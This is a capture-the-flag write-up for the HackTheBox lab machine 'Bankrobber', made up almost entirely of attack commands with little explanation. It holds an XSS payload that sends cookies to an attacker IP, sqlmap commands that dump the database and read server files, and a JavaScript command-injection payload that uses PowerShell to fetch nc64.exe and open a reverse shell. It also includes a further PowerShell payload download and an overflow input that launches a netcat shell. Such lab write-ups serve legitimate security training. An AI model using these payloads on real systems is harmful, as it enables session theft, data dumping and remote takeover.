HackTheBox – Bankrobber

Here register

Email : test@gmail.com

Password: test@123

root@kali:~/Downloads# gobuster dir -u http://10.10.10.154 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

<script>new Image().src=”http://10.10.15.194:90/test?output=”+document.cookie;</script>

username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D

Now try to login by admin cred

Username : admin

Password: Hopelessromantic

root@kali:~/Downloads# sqlmap -u http://10.10.10.154/admin/search.php –data “term=1*” –cookie=”id=1;username=YWRtaW4=;password=SG9wZWxlc3Nyb21hbnRpYw==” –dbms=MySQL -D bankrobber –dump

root@kali:~/Downloads# sqlmap -u http://10.10.10.154/admin/search.php –data “term=1*” –cookie=”id=1;username=YWRtaW4=;password=SG9wZWxlc3Nyb21hbnRpYw==” –dbms=MySQL –file-read=c:\\xampp\\htdocs\\admin\\backdoorchecker.php

root@kali:~/Downloads# cat shell.js

var request = new XMLHttpRequest();

var params = ‘cmd=dir|powershell -c “iwr -uri 10.10.15.230/nc64.exe -outfile %temp%\\n.exe”; %temp%\\n.exe -e cmd.exe 10.10.15.230 4445’;

request.open(‘POST’, ‘http://localhost/admin/backdoorchecker.php’, true);

request.setRequestHeader(‘Content-type’, ‘application/x-www-form-urlencoded’); request.send(params);

We can see bankv2

PS C:\Windows\Temp> (New-Object System.Net.WebClient).DownloadFile(“http://10.10.15.230/mp.exe”, “C:\Windows\Temp\mp.exe”)

[$] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\Windows\Temp\nc.exe -e cmd.exe 10.10.15.230 9000

@SAKSHAM DIXIT